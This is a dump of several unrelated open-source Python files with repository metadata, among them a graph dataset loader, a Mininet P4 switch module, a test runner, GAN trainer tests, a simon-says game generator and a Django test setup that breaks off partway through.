[
"Apache-2.0"
] | null | null | null |
multimodal/graph/node-based/dataset.py
|
shubham-gupta-iitr/mmmlX
|
3485e6191e0e45bf1c8168e4e928a36ab9264d22
|
[
"Apache-2.0"
] | 1 |
2022-02-12T23:38:10.000Z
|
2022-02-12T23:38:10.000Z
|
import os.path as osp
import typing
from numpy.lib.utils import source
import torch
# from torch_geometric.data import InMemoryDataset
from torch_geometric.data import Data, Dataset
from tqdm import tqdm
import numpy as np
from utils import get_ids, load_bert_feats, load_data, load_image_feats
import torch_geometric.transforms as T
class WebQnaDataset(Dataset):
def __init__(self, root, val=False, transform=None, pre_transform=None):
self._WebQna_dataset = load_data()
self._question_ids = get_ids(self._WebQna_dataset, val=val)
self._processed_file_names = ["node_"+str(q)+".pt" for q in self._question_ids]
self._bert_feats = load_bert_feats()
self._image_feats = load_image_feats()
self._caption_feats = {}
self._question_feats = {}
self._question_ids = self._question_ids[:18000]
t_id = self._question_ids[-1]
t2_id = self._question_ids[0]
for id in self._question_ids:
for k in self._bert_feats[id].keys():
if k=='Q':
self._question_feats[id] = torch.tensor(self._bert_feats[id]['Q'])
elif 'img' in k:
for img_k in self._bert_feats[id][k].keys():
self._caption_feats[img_k] = torch.tensor(self._bert_feats[id][k][img_k])
# print(self._question_feats[t_id])
# print(self._question_feats[t2_id])
# print(self._WebQna_dataset[t_id]['Q'])
# print(t_id)
# for id in self._question_feats:
# if len(self._WebQna_dataset[id]['img_posFacts']) > 1:
# print(self._WebQna_dataset[id]['img_posFacts'])
# break
super().__init__(root, transform, pre_transform)
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return self._processed_file_names
# return []
def len(self):
return len(self._question_ids)
pass
def get(self, idx:int)-> Data:
y = []
x = []
id = self._question_ids[idx]
ques_feat = self._question_feats[id]
for pos_image_dict in self._WebQna_dataset[id]['img_posFacts']:
image_id = pos_image_dict['image_id']
pos_image_feat = self._image_feats[image_id]
pos_image_caption_feat = self._caption_feats[image_id]
# node_features = torch.cat((ques_feat, pos_image_feat, pos_image_caption_feat),dim=-1).unsqueeze(0)
node_features = torch.cat((ques_feat, pos_image_caption_feat, pos_image_feat),dim=-1).unsqueeze(0)
x.append(node_features)
y.append(1)
# y.append([0,1])
for neg_image_dict in self._WebQna_dataset[id]['img_negFacts']:
image_id = neg_image_dict['image_id']
neg_image_feat = self._image_feats[image_id]
neg_image_caption_feat = self._caption_feats[image_id]
# node_features = torch.cat((ques_feat, neg_image_feat, neg_image_caption_feat),dim=-1).unsqueeze(0)
node_features = torch.cat((ques_feat, neg_image_caption_feat, neg_image_feat),dim=-1).unsqueeze(0)
x.append(node_features)
y.append(0)
# y.append([1,0])
# for sh in x:
# # print(sh[0].shape[0])
# if sh[0].shape[0] != 768:
# print("missing q")
# break
# if sh[2].shape[0] != 768:
# print("missing cap")
# break
node_idx = [i for i in range(len(y))]
# node_idx_idx = np.arange(start=0,stop=len(y),step=1)
# node_idx = list(np.random.permutation(node_idx))
# print(node_idx)
source_nodes = []
for i in range(len(y)):
source_nodes += [i]*(len(y)-1)
target_nodes = []
for i in range(len(y)):
target_nodes += node_idx[:i] + node_idx[i+1:]
# source_nodes = node_idx[:-1]
# target_nodes = node_idx[1:]
# print(len(source_nodes), len(target_nodes))
# assert False
# edge_index = torch.tensor([source_nodes + target_nodes, target_nodes + source_nodes], dtype=torch.long)
edge_index = torch.tensor([source_nodes, target_nodes], dtype=torch.long)
x = torch.cat(x,dim=0)
# y = torch.FloatTensor(y)
y = torch.LongTensor(y)
# y = torch.IntTensor(y)
data = Data(x=x, edge_index=edge_index, y=y)
data = T.ToUndirected()(data)
data = T.AddSelfLoops()(data)
data = T.NormalizeFeatures()(data)
return data
# def process(self):
# for id in tqdm(self._question_ids):
# # y = []
# # x = []
# # ques_feat = torch.tensor(self._question_feats[id])
# # for pos_image_dict in self._WebQna_dataset[id]['img_posFacts']:
# # image_id = pos_image_dict['image_id']
# # pos_image_feat = self._image_feats[image_id]
# # pos_image_caption_feat = self._caption_feats[image_id]
# # node_features = [ques_feat,pos_image_feat, pos_image_caption_feat]
# # x.append(node_features)
# # y.append(1)
# # for pos_image_dict in self._WebQna_dataset[id]['img_negFacts']:
# # image_id = pos_image_dict['image_id']
# # pos_image_feat = self._image_feats[image_id]
# # pos_image_caption_feat = self._caption_feats[image_id]
# # node_features = [ques_feat,pos_image_feat, pos_image_caption_feat]
# # x.append(node_features)
# # y.append(0)
# # for sh in x:
# # # print(sh[0].shape[0])
# # if sh[0].shape[0] != 768:
# # print("missing q")
# # break
# # if sh[2].shape[0] != 768:
# # print("missing cap")
# # break
# # node_idx = [i for i in range(len(y))]
# # source_nodes = node_idx[:-1]
# # target_nodes = node_idx[1:]
# # edge_index = torch.tensor([source_nodes, target_nodes], dtype=torch.long)
# # y = torch.FloatTensor(y)
# # data = Data(x=x, edge_index=edge_index, y=y)
# # torch.save(data, osp.join(self.processed_dir, f'node_{id}.pt'))
| 42.096774 | 113 | 0.56613 |
4a1b6ff2ce476b0c8d5daef0e0670d8d2c8d16dc
| 128 |
py
|
Python
|
sharktopoda_client/localization/Preconditions.py
|
kevinsbarnard/sharktopoda-client-py
|
21130b19436f193bd76751613a529512d76d9e84
|
[
"MIT"
] | null | null | null |
sharktopoda_client/localization/Preconditions.py
|
kevinsbarnard/sharktopoda-client-py
|
21130b19436f193bd76751613a529512d76d9e84
|
[
"MIT"
] | 2 |
2021-11-19T23:25:39.000Z
|
2021-11-19T23:25:42.000Z
|
sharktopoda_client/localization/Preconditions.py
|
kevinsbarnard/sharktopoda-client-py
|
21130b19436f193bd76751613a529512d76d9e84
|
[
"MIT"
] | null | null | null |
class Preconditions:
@staticmethod
def require(ok: bool, msg: str):
if not ok:
raise ValueError(msg)
| 25.6 | 36 | 0.601563 |
4a1b702476bd548ccfeaa8f47ea9faf4c0eadd4f
| 4,761 |
py
|
Python
|
tests/run_test.py
|
huypn12/Oclgrind
|
5c9a39f2f6a6c0d0ab3d09cc4da046d41e09c214
|
[
"BSD-3-Clause"
] | 284 |
2015-01-20T19:21:39.000Z
|
2022-03-14T08:42:44.000Z
|
tests/run_test.py
|
huypn12/Oclgrind
|
5c9a39f2f6a6c0d0ab3d09cc4da046d41e09c214
|
[
"BSD-3-Clause"
] | 133 |
2015-01-17T11:51:23.000Z
|
2022-03-03T11:54:21.000Z
|
tests/run_test.py
|
huypn12/Oclgrind
|
5c9a39f2f6a6c0d0ab3d09cc4da046d41e09c214
|
[
"BSD-3-Clause"
] | 67 |
2015-03-24T18:02:38.000Z
|
2022-01-07T13:34:06.000Z
|
# run_test.py (Oclgrind)
# Copyright (c) 2013-2019, James Price and Simon McIntosh-Smith,
# University of Bristol. All rights reserved.
#
# This program is provided under a three-clause BSD license. For full
# license terms please see the LICENSE file distributed with this
# source code.
import errno
import os
import re
import subprocess
import sys
# Check arguments
if len(sys.argv) != 3:
print('Usage: python run_test.py OCLGRIND-EXE TEST_EXE|TEST.sim')
sys.exit(1)
if not os.path.isfile(sys.argv[2]):
print('Test file not found')
sys.exit(1)
# Construct paths to test inputs/outputs
oclgrind_exe = sys.argv[1]
test_full_path = sys.argv[2]
test_dir = os.path.dirname(os.path.realpath(test_full_path))
test_file = os.path.basename(test_full_path)
test_name = os.path.splitext(test_file)[0]
current_dir = os.getcwd()
if test_file.endswith('.sim'):
test_inp = test_full_path[:-4] + '.inp'
test_ref = test_full_path[:-4] + '.ref'
else:
if test_full_path[0] == '/':
rel_path = test_full_path[test_full_path.find('/tests/') + 7:]
else:
rel_path = test_full_path
test_inp = os.path.dirname(os.path.abspath(__file__)) + os.path.sep \
+ rel_path + '.inp'
test_ref = os.path.dirname(os.path.abspath(__file__)) + os.path.sep \
+ rel_path + '.ref'
# Enable race detection and uninitialized memory plugins
os.environ["OCLGRIND_CHECK_API"] = "1"
os.environ["OCLGRIND_DATA_RACES"] = "1"
os.environ["OCLGRIND_UNINITIALIZED"] = "1"
def fail(ret=1):
print('FAILED')
sys.exit(ret)
def run(output_suffix):
# Get filename for test output
if test_file.endswith('.sim'):
test_out = test_dir.split(os.path.sep)[-1] + os.path.sep + \
test_name + output_suffix + '.out'
else:
test_out = test_dir + os.path.sep + \
test_name + output_suffix + '.out'
output_dir = os.path.dirname(test_out)
try:
os.makedirs(output_dir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(output_dir):
pass
else:
raise
out = open(test_out, 'w')
try:
inp = open(test_inp, 'r')
except:
inp = None
# Run test
if test_file.endswith('.sim'):
os.chdir(test_dir)
cmd = [oclgrind_exe]
# Add any additional arguments specified in the test file
first_line = open(test_file).readline()[:-1]
if first_line[:7] == '# ARGS:':
cmd.extend(first_line[8:].split(' '))
cmd.append(test_file)
retval = subprocess.call(cmd, stdout=out, stderr=out, stdin=inp)
os.chdir(current_dir)
else:
retval = subprocess.call([oclgrind_exe,test_full_path],
stdout=out, stderr=out, stdin=inp)
out.close()
if retval != 0:
print('Test returned non-zero value (' + str(retval) + ')')
fail(retval)
# Compare output to reference file (if provided)
if os.path.isfile(test_ref):
# Open output and reference files
out = open(test_out).read().splitlines()
ref = open(test_ref).read().splitlines()
# Check output matches references
oi = 0
for line in ref:
if len(line) == 0:
continue
type = line.split()[0]
text = line[6:]
# Find next non-blank line in output file
while True:
if oi >= len(out):
print('Unexpected end of output when matching ' + line)
fail()
if len(out[oi]):
break
oi += 1
if type == 'ERROR':
# Check first line of error contains reference message
if not text in out[oi]:
print('Expected ' + line)
print('Found "' + out[oi] + '"')
fail()
# Skip remaining lines of error
while oi < len(out) and len(out[oi]):
oi += 1
elif type == 'EXACT':
# Check line of output matches reference exactly
if not text == out[oi]:
print('Expected ' + line)
print('Found "' + out[oi] + '"')
fail()
oi += 1
elif type == 'MATCH':
# Check line of output contains reference text
if not text in out[oi]:
print('Expected ' + line)
print('Found "' + out[oi] + '"')
fail()
oi += 1
else:
print('Invalid match type in reference file')
fail()
# Check there are no more lines in output
while oi < len(out):
if len(out[oi]) > 0:
print('Unexpected output after all matches completed (line %d):' % oi)
print(out[oi])
fail()
oi += 1
print('Running test with optimisations')
run('')
print('PASSED')
print('')
print('Running test without optimisations')
os.environ["OCLGRIND_BUILD_OPTIONS"] = "-cl-opt-disable"
run('_noopt')
print('PASSED')
# Test passed
sys.exit(0)
| 26.898305 | 80 | 0.611216 |
4a1b706b619d8318734189983a7e9c91579c5ce1
| 2,523 |
py
|
Python
|
boldigger/first_hit.py
|
lokalmatador123/BOLDigger
|
49888c4e01b32cbdfeff9dcaefe2734933100391
|
[
"MIT"
] | null | null | null |
boldigger/first_hit.py
|
lokalmatador123/BOLDigger
|
49888c4e01b32cbdfeff9dcaefe2734933100391
|
[
"MIT"
] | null | null | null |
boldigger/first_hit.py
|
lokalmatador123/BOLDigger
|
49888c4e01b32cbdfeff9dcaefe2734933100391
|
[
"MIT"
] | null | null | null |
import openpyxl, datetime
import pandas as pd
import PySimpleGUI as sg
def first_hit(xlsx_path):
## load data into a dataframe
data = pd.read_excel(xlsx_path, header = 0, engine = 'openpyxl')
data = data.rename(columns = {'You searched for': 'ID'})
## open workbook for checking the type and create writer to save data later
wb = openpyxl.load_workbook(xlsx_path)
ws = wb.active
writer = pd.ExcelWriter(xlsx_path, engine = 'openpyxl')
writer.book = wb
## check if coi or its / rbcl
type = 'coi' if ws.cell(row = 1, column = 11).value == 'Process ID' else 'its_rbcl'
## top hit is every 20th hit
if type == 'coi':
data = data.iloc[::20]
## there can be any number of hit between 1 and 99, so lookup is more complicated
if type == 'its_rbcl':
## must include nomatch, so we dont lose OTUS
first_hits = [1, 'No Match']
## remove everything that is not a top hit or a NoMatch
## remove nomatch duplices, drop the first non duplicate Nomatch
data = data[data['Rank'].isin(first_hits)]
data = data.drop_duplicates()
data = data.dropna(subset=['ID'])
## close and save the writer
data.to_excel(writer, sheet_name = 'First hit', index = False)
wb.save(xlsx_path)
writer.close()
## main function to control GUI and flow
def main(xlsx_path):
## define a layout for the new window
layout = [
[sg.Multiline(size = (50, 10), key = 'out', autoscroll = True)]
]
## run the download loop only once. After that only run event loop
window = sg.Window('Adding top hits', layout)
ran = False
while True:
event, values = window.read(timeout = 100)
if not ran:
window['out'].print('%s: Opening resultfile.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
## run first hit function
window['out'].print('%s: Filtering data.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
first_hit(xlsx_path)
window['out'].print('%s: Saving result to new tab.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
window['out'].print('%s: Done. Close to continue.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
ran = True
if event == None:
break
window.Close()
| 32.766234 | 112 | 0.585811 |
4a1b70c39cb8fb6d879bad8e66cdef2eb21005b6
| 3,458 |
py
|
Python
|
tests/torchgan/test_trainer.py
|
shubhsherl/torchgan
|
3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d
|
[
"MIT"
] | null | null | null |
tests/torchgan/test_trainer.py
|
shubhsherl/torchgan
|
3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d
|
[
"MIT"
] | null | null | null |
tests/torchgan/test_trainer.py
|
shubhsherl/torchgan
|
3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d
|
[
"MIT"
] | null | null | null |
import unittest
import torch
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import torchvision
from torch.optim import Adam
import torch.utils.data as data
import torchvision.datasets as dsets
import torchvision.transforms as transforms
from torchgan.metrics import *
from torchgan import *
from torchgan.models import *
from torchgan.losses import *
from torchgan.trainer import Trainer
def mnist_dataloader():
train_dataset = dsets.MNIST(root='./mnist', train=True,
transform=transforms.Compose([transforms.Pad((2, 2)),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5),
std=(0.5, 0.5, 0.5))]), download=True)
train_loader = data.DataLoader(train_dataset, batch_size=128, shuffle=True)
return train_loader
class TestTrainer(unittest.TestCase):
def test_trainer_dcgan(self):
network_params = {
"generator": {"name": DCGANGenerator, "args": {"out_channels": 1, "step_channels": 4},
"optimizer": {"name": Adam, "args": {"lr": 0.0002, "betas": (0.5, 0.999)}}},
"discriminator": {"name": DCGANDiscriminator, "args": {"in_channels": 1, "step_channels": 4},
"optimizer": {"name": Adam, "args": {"lr": 0.0002, "betas": (0.5, 0.999)}}}
}
losses_list = [MinimaxGeneratorLoss(), MinimaxDiscriminatorLoss()]
trainer = Trainer(network_params, losses_list, sample_size=1, epochs=1,
device=torch.device('cpu'))
trainer(mnist_dataloader())
def test_trainer_cgan(self):
network_params = {
"generator": {"name": ConditionalGANGenerator, "args": {"num_classes": 10,
"out_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}},
"discriminator": {"name": ConditionalGANDiscriminator, "args": {"num_classes": 10,
"in_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}}
}
losses_list = [MinimaxGeneratorLoss(), MinimaxDiscriminatorLoss()]
trainer = Trainer(network_params, losses_list, sample_size=1, epochs=1,
device=torch.device('cpu'))
trainer(mnist_dataloader())
def test_trainer_acgan(self):
network_params = {
"generator": {"name": ACGANGenerator, "args": {"num_classes": 10,
"out_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}},
"discriminator": {"name": ACGANDiscriminator, "args": {"num_classes": 10,
"in_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}}
}
losses_list = [MinimaxGeneratorLoss(), MinimaxDiscriminatorLoss(),
AuxiliaryClassifierGeneratorLoss(), AuxiliaryClassifierDiscriminatorLoss()]
trainer = Trainer(network_params, losses_list, sample_size=1, epochs=1,
device=torch.device('cpu'))
trainer(mnist_dataloader())
| 51.61194 | 105 | 0.565067 |
4a1b7115e1ef0bfeb3007ec018de8f9ac50a29ee
| 937 |
py
|
Python
|
src/properties/get_pc_non_productive.py
|
ngannguyen/aimseqtk
|
1ebaee3b927f7fb128de4a59b759c19fceeefb5b
|
[
"MIT"
] | 2 |
2015-03-08T20:46:05.000Z
|
2020-03-14T12:06:11.000Z
|
src/properties/get_pc_non_productive.py
|
ngannguyen/aimseqtk
|
1ebaee3b927f7fb128de4a59b759c19fceeefb5b
|
[
"MIT"
] | 1 |
2015-03-01T00:40:55.000Z
|
2015-03-01T00:40:55.000Z
|
src/properties/get_pc_non_productive.py
|
ngannguyen/aimseqtk
|
1ebaee3b927f7fb128de4a59b759c19fceeefb5b
|
[
"MIT"
] | null | null | null |
import os
import sys
def read_clonesize(file):
s2clones = {}
f = open(file, 'r')
f.readline()
for line in f:
items = line.strip().split('\t')
sample = items[0]
clones = int(float(items[1]))
s2clones[sample] = clones
f.close()
return s2clones
def get_np_pc(p_s2clones, np_s2clones, outfile):
f = open(outfile, 'w')
f.write("#Sample\t%%productive\t%%non_productive\n")
for s, p in p_s2clones.iteritems():
np = 0
if s in np_s2clones:
np = np_s2clones[s]
total = p + np
if total > 0:
f.write("%s\t%f\t%f\n" % (s, 100.0*p/total, 100.0*np/total))
f.close()
def main():
pfile = sys.argv[1]
npfile = sys.argv[2]
outfile = sys.argv[3]
p_s2clones = read_clonesize(pfile)
np_s2clones = read_clonesize(npfile)
get_np_pc(p_s2clones, np_s2clones, outfile)
if __name__ == '__main__':
main()
| 24.025641 | 72 | 0.578442 |
4a1b7237674cf3c389b71652b1ce86b7f3051507
| 5,650 |
py
|
Python
|
athos/p4_mininet.py
|
Belthazaar/athos
|
f8b73666f272f4e2d84be090e6dd6bc2953c1c3e
|
[
"Apache-2.0"
] | null | null | null |
athos/p4_mininet.py
|
Belthazaar/athos
|
f8b73666f272f4e2d84be090e6dd6bc2953c1c3e
|
[
"Apache-2.0"
] | null | null | null |
athos/p4_mininet.py
|
Belthazaar/athos
|
f8b73666f272f4e2d84be090e6dd6bc2953c1c3e
|
[
"Apache-2.0"
] | 1 |
2021-03-01T01:24:02.000Z
|
2021-03-01T01:24:02.000Z
|
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Further work: Christoff Visser (christoff@iij.ad.jp)
from mininet.net import Mininet
from mininet.node import Switch, Host
from mininet.log import setLogLevel, info, error, debug
from mininet.moduledeps import pathCheck
from sys import exit
import os
import tempfile
import socket
class P4Host(Host):
def config(self, **params):
r = super(Host, self).config(**params)
self.defaultIntf().rename("eth0")
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload eth0 %s off" % off
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
def describe(self):
print("**********")
print(self.name)
print("default interface: %s\t%s\t%s" %(
self.defaultIntf().name,
self.defaultIntf().IP(),
self.defaultIntf().MAC()
))
print("**********")
class P4Switch(Switch):
"""P4 virtual switch"""
device_id = 0
def __init__(self, name, sw_path = None, json_path = None,
thrift_port = None,
pcap_dump = False,
log_console = False,
verbose = False,
device_id = None,
enable_debugger = False,
**kwargs):
Switch.__init__(self, name, **kwargs)
assert(sw_path)
assert(json_path)
# make sure that the provided sw_path is valid
pathCheck(sw_path)
# make sure that the provided JSON file exists
if not os.path.isfile(json_path):
error("Invalid JSON file.\n")
exit(1)
self.sw_path = sw_path
self.json_path = json_path
self.verbose = verbose
logfile = "/tmp/p4s.{}.log".format(self.name)
self.output = open(logfile, 'w')
self.thrift_port = thrift_port
self.pcap_dump = pcap_dump
self.enable_debugger = enable_debugger
self.log_console = log_console
if device_id is not None:
self.device_id = device_id
P4Switch.device_id = max(P4Switch.device_id, device_id)
else:
self.device_id = P4Switch.device_id
P4Switch.device_id += 1
self.nanomsg = "ipc:///tmp/bm-{}-log.ipc".format(self.device_id)
@classmethod
def setup(cls):
pass
def check_switch_started(self, pid):
"""While the process is running (pid exists), we check if the Thrift
server has been started. If the Thrift server is ready, we assume that
the switch was started successfully. This is only reliable if the Thrift
server is started at the end of the init process"""
while True:
if not os.path.exists(os.path.join("/proc", str(pid))):
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.5)
result = sock.connect_ex(("localhost", self.thrift_port))
finally:
sock.close()
if result == 0:
return True
def start(self, controllers):
"Start up a new P4 switch"
info("Starting P4 switch {}.\n".format(self.name))
args = [self.sw_path]
for port, intf in self.intfs.items():
if not intf.IP():
args.extend(['-i', str(port) + "@" + intf.name])
if self.pcap_dump:
args.append("--pcap")
# args.append("--useFiles")
if self.thrift_port:
args.extend(['--thrift-port', str(self.thrift_port)])
if self.nanomsg:
args.extend(['--nanolog', self.nanomsg])
args.extend(['--device-id', str(self.device_id)])
P4Switch.device_id += 1
args.append(self.json_path)
if self.enable_debugger:
args.append("--debugger")
if self.log_console:
args.append("--log-console")
logfile = "/tmp/p4s.{}.log".format(self.name)
info(' '.join(args) + "\n")
pid = None
with tempfile.NamedTemporaryFile() as f:
# self.cmd(' '.join(args) + ' > /dev/null 2>&1 &')
self.cmd(' '.join(args) + ' >' + logfile + ' 2>&1 & echo $! >> ' + f.name)
pid = int(f.read())
debug("P4 switch {} PID is {}.\n".format(self.name, pid))
if not self.check_switch_started(pid):
error("P4 switch {} did not start correctly.\n".format(self.name))
exit(1)
info("P4 switch {} has been started.\n".format(self.name))
def stop(self):
"Terminate P4 switch."
self.output.flush()
self.cmd('kill %' + self.sw_path)
self.cmd('wait')
self.deleteIntfs()
def attach(self, intf):
"Connect a data port"
assert(0)
def detach(self, intf):
"Disconnect a data port"
assert(0)
| 35.093168 | 86 | 0.579292 |
4a1b72480f701b03aa9e487d3f899ec04fdb2184
| 4,405 |
py
|
Python
|
flo_core/src/simon_says.py
|
Rehab-Robotics-Lab/LilFloSystem
|
913ee95bd776331139bc741ca65dbc53eaa04c21
|
[
"BSD-4-Clause-UC"
] | 10 |
2020-04-03T13:02:52.000Z
|
2021-12-22T23:24:00.000Z
|
flo_core/src/simon_says.py
|
Rehab-Robotics-Lab/LilFloSystem
|
913ee95bd776331139bc741ca65dbc53eaa04c21
|
[
"BSD-4-Clause-UC"
] | 76 |
2020-04-04T00:25:29.000Z
|
2022-02-27T09:31:49.000Z
|
flo_core/src/simon_says.py
|
Rehab-Robotics-Lab/LilFloSystem
|
913ee95bd776331139bc741ca65dbc53eaa04c21
|
[
"BSD-4-Clause-UC"
] | 6 |
2020-04-08T01:19:46.000Z
|
2021-07-09T01:57:16.000Z
|
#!/usr/bin/env python
"""A module for generating simon says type games"""
import random
from itertools import chain
# ok to have too many args for a utility func
# pylint: disable=too-many-arguments
def sort_defs(new_def, left, right, process_step, check_side_seq, append_action):
"""Sort the definitions from a new game definition into the correct
arms/sequences with speech
Args:
new_def: the game definition
left: sequences on the left arm (add to this)
right: sequences on the right arm (add to this)
process_step: Function to process the step to get out the targets and speech
check_side_seq: Function to find out which side a sequence of motions operates on
append_action: Add the action to the action bag, handling any specialization for game
"""
for step in new_def.steps:
targets, speech = process_step(step, True)
if step.type == 'pose_right':
right.append({'targets': targets, 'speech': speech})
elif step.type == 'pose_left':
left.append({'targets': targets, 'speech': speech})
elif step.type == 'move':
side = check_side_seq(step.id)
if side == 'right':
right.append({'targets': targets, 'speech': speech})
elif side == 'left':
left.append({'targets': targets, 'speech': speech})
elif side == 'both':
append_action(targets, speech)
else:
raise Exception
else:
raise Exception
def mix_bimanual(left, right, append_action):
"""Mix up actions to make them bimanual
Args:
left: The left arm actions
right: The right arm actions
append_action: function to append actions to the final game sequence
"""
while left and right:
left_act = left.pop()
right_act = right.pop()
if random.getrandbits(1):
speech = left_act['speech'] + ' and ' + right_act['speech']
else:
speech = right_act['speech'] + ' and ' + left_act['speech']
targets = left_act['targets']+right_act['targets']
targets.sort(key=lambda target: target.target_completion_time)
append_action(targets, speech)
def simon_says(new_def, process_step, check_side_seq, neutral):
"""Generate a simon says game
Args:
new_def: The game bucket definition to use
process_step: The function which can be used to process steps into actions
Returns: The action list that defines the game
"""
actions_list = []
actions_list.append(
{'speech': 'in simon says, I will tell you something to do and ' +
'show you how to do it, mirrored. If I say simon says, you ' +
'should do it with me. If I do not say simon says, you should ' +
'not do the action. Watch out, I may try to trick you. ' +
'After every movement return to a ready position'})
actions_bag = []
left = []
right = []
def append_action(targets, speech):
"""Append a new action to the bag of actions, adding a non-simon
says action with 30% frequency
Args:
targets: Target to move arms to
speech: Speech to speak
"""
actions_bag.append(
{'speech': 'simon says '+speech, 'targets': targets})
if random.random() > 0.7: # this is where we add in non-simon says tasks
actions_bag.append(
{'speech': speech, 'targets': targets})
sort_defs(new_def, left, right, process_step,
check_side_seq, append_action)
random.shuffle(left)
random.shuffle(right)
if new_def.bimanual:
mix_bimanual(left, right, append_action)
# If either we didn't run in bimanual mode or if there is just some left over in one arm:
while left:
left_act = left.pop()
append_action(left_act['targets'], left_act['speech'])
while right:
right_act = right.pop()
append_action(right_act['targets'], right_act['speech'])
random.shuffle(actions_bag)
actions_list += actions_bag
actions_list.append(
{'speech': 'that was a lot of fun, thanks for playing with me'})
actions_list = list(chain.from_iterable(
(neutral, at) for at in actions_list))
return actions_list
| 37.330508 | 93 | 0.619296 |
4a1b729e64875f271f2998797c7395196ee2fbbb
| 9,203 |
py
|
Python
|
Vereniging/test_lijstverenigingen.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 1 |
2021-12-22T13:11:12.000Z
|
2021-12-22T13:11:12.000Z
|
Vereniging/test_lijstverenigingen.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 9 |
2020-10-28T07:07:05.000Z
|
2021-06-28T20:05:37.000Z
|
Vereniging/test_lijstverenigingen.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019-2021 Ramon van der Winkel.
# All rights reserved.
# Licensed under BSD-3-Clause-Clear. See LICENSE file for details.
from django.test import TestCase
from Competitie.models import DeelCompetitie, LAAG_BK, LAAG_RK, LAAG_REGIO
from Competitie.operations import competities_aanmaken
from Functie.models import maak_functie
from NhbStructuur.models import NhbRayon, NhbRegio, NhbCluster, NhbVereniging
from Sporter.models import Sporter
from TestHelpers.e2ehelpers import E2EHelpers
from TestHelpers import testdata
import datetime
class TestVerenigingenLijst(E2EHelpers, TestCase):
""" unit tests voor de Vereniging applicatie, Lijst Verenigingen """
url_lijst = '/vereniging/accommodaties/lijst/'
testdata = None
@classmethod
def setUpTestData(cls):
cls.testdata = testdata.TestData()
cls.testdata.maak_accounts()
def _prep_beheerder_lid(self, voornaam):
lid_nr = self._next_lid_nr
self._next_lid_nr += 1
lid = Sporter()
lid.lid_nr = lid_nr
lid.geslacht = "M"
lid.voornaam = voornaam
lid.achternaam = "Tester"
lid.email = voornaam.lower() + "@nhb.test"
lid.geboorte_datum = datetime.date(year=1972, month=3, day=4)
lid.sinds_datum = datetime.date(year=2010, month=11, day=12)
lid.bij_vereniging = self._ver
lid.save()
return self.e2e_create_account(lid_nr, lid.email, E2EHelpers.WACHTWOORD, accepteer_vhpg=True)
def setUp(self):
""" eenmalige setup voor alle tests
wordt als eerste aangeroepen
"""
self._next_lid_nr = 100001
self.rayon_2 = NhbRayon.objects.get(rayon_nr=2)
self.regio_101 = NhbRegio.objects.get(regio_nr=101)
# maak een test vereniging
ver = NhbVereniging()
ver.naam = "Grote Club"
ver.ver_nr = "1000"
ver.regio = self.regio_101
# secretaris kan nog niet ingevuld worden
ver.save()
self._ver = ver
self.nhb_ver1 = ver
# maak HWL functie aan voor deze vereniging
self.functie_hwl = maak_functie("HWL Vereniging %s" % ver.ver_nr, "HWL")
self.functie_hwl.nhb_ver = ver
self.functie_hwl.save()
# maak test leden aan die we kunnen koppelen aan beheerders functies
self.account_bko = self._prep_beheerder_lid('BKO')
self.account_rko = self._prep_beheerder_lid('RKO')
self.account_rcl = self._prep_beheerder_lid('RCL')
self.account_hwl = self._prep_beheerder_lid('HWL')
self.account_schutter = self._prep_beheerder_lid('Schutter')
# creëer een competitie met deelcompetities
competities_aanmaken(jaar=2019)
self.functie_bko = DeelCompetitie.objects.filter(laag=LAAG_BK)[0].functie
self.functie_rko = DeelCompetitie.objects.filter(laag=LAAG_RK, nhb_rayon=self.rayon_2)[0].functie
self.functie_rcl = DeelCompetitie.objects.filter(laag=LAAG_REGIO, nhb_regio=self.regio_101)[0].functie
self.functie_bko.accounts.add(self.account_bko)
self.functie_rko.accounts.add(self.account_rko)
self.functie_rcl.accounts.add(self.account_rcl)
self.functie_hwl.accounts.add(self.account_hwl)
# maak nog een test vereniging, zonder HWL functie
ver = NhbVereniging()
ver.naam = "Kleine Club"
ver.ver_nr = "1100"
ver.regio = self.regio_101
# secretaris kan nog niet ingevuld worden
ver.save()
# stop de vereniging in clusters
cluster = NhbCluster.objects.filter(regio=ver.regio, gebruik='18').all()[0]
ver.clusters.add(cluster)
